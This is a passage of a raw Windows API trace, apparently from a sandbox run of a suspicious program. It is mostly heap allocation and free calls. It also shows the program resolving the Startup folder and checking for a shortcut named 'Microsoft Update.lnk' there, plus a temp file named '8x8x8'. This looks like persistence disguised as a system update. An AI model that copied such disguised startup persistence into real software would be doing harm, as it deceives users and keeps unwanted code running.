RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0243.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0243.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0243.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0243.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0243.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0243.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0243.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0243.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0243.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0243.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0243.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0243.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0243.770] FreeLibrary (hLibModule=0x76240000) returned 1 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0243.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0243.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0243.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865d30 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38658e0 | out: hHeap=0x2af0000) returned 1 [0243.772] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0243.772] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0243.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0243.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0243.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0243.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0243.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865d30 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0243.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0243.774] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0243.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0243.774] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0243.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0243.774] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0243.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0243.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0243.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0243.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0243.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0243.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0243.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0243.775] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0243.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0243.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0243.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0243.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0243.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0243.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0243.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0243.776] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0243.776] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0243.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0243.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0243.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0243.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0243.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0243.776] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0243.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0243.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0243.777] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0243.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0243.777] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eac90 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0243.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0243.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0243.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0243.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0243.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0243.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0243.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0243.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0243.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0243.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0243.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0243.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0243.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0243.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eac90 | out: hHeap=0x2af0000) returned 1 [0243.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0243.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0243.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0243.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0243.778] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0243.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0243.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0243.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0243.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0243.778] HeapFree (in: 